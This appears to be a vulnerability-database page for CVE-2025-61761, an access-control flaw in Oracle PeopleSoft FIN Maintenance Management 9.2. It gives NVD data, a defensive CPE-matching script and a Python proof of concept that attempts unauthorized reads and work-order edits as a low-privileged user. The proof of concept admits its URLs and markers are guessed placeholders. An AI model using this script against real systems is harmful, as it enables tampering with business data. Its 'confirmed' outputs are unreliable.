Security Vulnerability Report
CVE-2025-61761

Published: 2025-10-21 20:20:53
Last Modified: 2025-10-29 17:39:55

Description

Vulnerability in the PeopleSoft Enterprise FIN Maintenance Management product of Oracle PeopleSoft (component: Work Order Management). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise FIN Maintenance Management. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise FIN Maintenance Management accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise FIN Maintenance Management accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N).

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:peoplesoft_enterprise_fin_maintenance_management:9.2:*:*:*:*:*:*:* - VULNERABLE
Oracle PeopleSoft Enterprise FIN Maintenance Management 9.2
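
The criteria above pins only the version (9.2) and leaves the update field as a wildcard, so every 9.2 installation matches regardless of which update image it runs; a CPE match therefore means "in scope", not "unpatched". The following is an added example, not part of the NVD record: a simplified CPE 2.3 formatted-string matcher run over a constructed asset inventory. The hostnames and inventory CPE names are made up for the example, and the wildcard-on-the-asset-side rule is an assumption noted in the code.

```python
"""Check an asset inventory against the NVD CPE match criteria for CVE-2025-61761.

Added example; not part of the NVD record. Implements a simplified CPE 2.3
formatted-string comparison: 13 colon-separated components, '*' = ANY, '-' = NA,
and '\\:' escapes a literal colon inside a component. The inventory is constructed.
"""
import re

# Criteria copied from the configurations block above: version 9.2, update ANY.
CRITERIA = ("cpe:2.3:a:oracle:peoplesoft_enterprise_fin_maintenance_management"
            ":9.2:*:*:*:*:*:*:*")

ATTRS = ["part", "vendor", "product", "version", "update", "edition",
         "language", "sw_edition", "target_sw", "target_hw", "other"]


def split_cpe(cpe: str) -> dict:
    """Split on unescaped colons and return the 11 attribute components by name."""
    parts = re.split(r"(?<!\\):", cpe)
    if len(parts) != 13 or parts[0] != "cpe" or parts[1] != "2.3":
        raise ValueError(f"not a CPE 2.3 formatted string: {cpe!r}")
    return dict(zip(ATTRS, parts[2:]))


def attr_matches(criterion: str, asset: str) -> bool:
    """Compare one attribute. Assumption: a wildcard on the asset side is treated
    as unknown, hence no match against a specific criterion (conservative)."""
    if criterion == "*":
        return True
    if criterion == "-" or asset == "-":
        return criterion == asset
    if asset == "*":
        return False
    return criterion.lower() == asset.lower()


def cpe_matches(criteria: str, asset: str) -> bool:
    """True when every attribute of the asset CPE falls inside the criteria."""
    c, a = split_cpe(criteria), split_cpe(asset)
    return all(attr_matches(c[k], a[k]) for k in ATTRS)


def in_scope(inventory: list, criteria: str = CRITERIA) -> list:
    """Return the asset names whose CPE matches the vulnerable criteria."""
    return [name for name, cpe in inventory if cpe_matches(criteria, cpe)]


# Constructed inventory: (hostname, CPE name assigned by the asset owner).
INVENTORY = [
    ("fscm-prod-01", "cpe:2.3:a:oracle:peoplesoft_enterprise_fin_maintenance_management:9.2:*:*:*:*:*:*:*"),
    ("fscm-prod-02", "cpe:2.3:a:oracle:peoplesoft_enterprise_fin_maintenance_management:9.2:update_52:*:*:*:*:*:*"),
    ("fscm-legacy", "cpe:2.3:a:oracle:peoplesoft_enterprise_fin_maintenance_management:9.1:*:*:*:*:*:*:*"),
    ("hcm-prod-01", "cpe:2.3:a:oracle:peoplesoft_enterprise_hcm_human_resources:9.2:*:*:*:*:*:*:*"),
]

if __name__ == "__main__":
    for host in in_scope(INVENTORY):
        print(f"{host}: matches {CRITERIA}; confirm the October 2025 CPU is applied")
```

Both 9.2 hosts match, including the one carrying an update value, because the criteria's update field is ANY; patch state has to be established from the vendor advisory, not from the CPE.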

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61761 Oracle PeopleSoft FIN Maintenance Management Access Control Bypass PoC
# This PoC demonstrates the access control bypass in the Work Order Management component.
#
# Caveat: Oracle's Critical Patch Update advisory publishes no technical details for
# this CVE. The component URL, the IC* request parameters and the response markers
# below are the PoC author's placeholders, not values taken from the advisory; verify
# them against the target before trusting the printed "confirmed" messages.

import sys

import requests

TARGET_URL = "https://target-peoplesoft-host:9030"
USERNAME = "low_privileged_user"
PASSWORD = "user_password"


def login(session, url, username, password):
    """Authenticate to PeopleSoft with low-privileged credentials."""
    # Standard PeopleSoft sign-on URL. The original PoC posted the credentials to the
    # component URL itself, which does not perform sign-on.
    login_url = f"{url}/psp/ps/?cmd=login"
    data = {
        "userid": username,
        "pwd": password,
    }
    response = session.post(login_url, data=data, allow_redirects=True)
    # HTTP 200 alone is not success: a rejected sign-on re-renders the login form
    # with 200. PeopleSoft issues the PS_TOKEN session cookie only after a
    # successful sign-on, so that is what we check.
    if response.ok and "PS_TOKEN" in session.cookies:
        print("[+] Login successful with low-privileged account")
        return True
    return False


def exploit_work_order_access(session, url):
    """Attempt unauthorized access to work order management data."""
    # Placeholder component URL (see caveat above).
    work_order_url = f"{url}/psc/ps/EMPLOYEE/CRM/c/MAINTAIN_WORK_ORDER.GBL"

    # Attempt unauthorized read of restricted work orders.
    params = {
        "ICType": "Search",
        "ICElementNum": "1",
        "ICAction": "#SEARCH",
        "WORK_ORDER_ID": "*",  # Try to enumerate all work orders
    }
    response = session.get(work_order_url, params=params)
    if response.status_code != 200:
        print(f"[-] Search request returned HTTP {response.status_code}")
        return
    print("[+] Unauthorized data access may be possible")

    # "WORK_ORDER" / "RESTRICTED" are the PoC author's markers for restricted rows;
    # they are not documented response strings.
    if "WORK_ORDER" in response.text and "RESTRICTED" in response.text:
        print("[!] CVE-2025-61761: Access control bypass confirmed!")
        print("[!] Unauthorized read access to restricted work order data")

        # Attempt unauthorized modification.
        modify_data = {
            "ICAction": "#SAVE",
            "WORK_ORDER_ID": "WO_TEST_001",
            "STATUS": "CLOSED",  # Try to modify status without authorization
            "COMMENTS": "Modified by unauthorized user",
        }
        response = session.post(work_order_url, data=modify_data)
        # "SAVED" is likewise a placeholder success marker.
        if response.status_code == 200 and "SAVED" in response.text:
            print("[!] CVE-2025-61761: Unauthorized write access confirmed!")


if __name__ == "__main__":
    session = requests.Session()
    if not login(session, TARGET_URL, USERNAME, PASSWORD):
        print("[-] Login failed")
        sys.exit(1)
    exploit_work_order_access(session, TARGET_URL)

References

https://www.oracle.com/security-alerts/cpuoct2025.html (Vendor Advisory: Oracle Critical Patch Update, October 2025)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-61761",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-21T20:20:52.633",
    "lastModified": "2025-10-29T17:39:55.313",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Vulnerability in the PeopleSoft Enterprise FIN Maintenance Management product of Oracle PeopleSoft (component: Work Order Management). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise FIN Maintenance Management. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise FIN Maintenance Management accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise FIN Maintenance Management accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N)."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-284"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_fin_maintenance_management:9.2:*:*:*:*:*:*:*",
                "matchCriteriaId": "3BADF8E3-2E9A-4220-9D89-5A82D7709B33"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.oracle.com/security-alerts/cpuoct2025.html",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}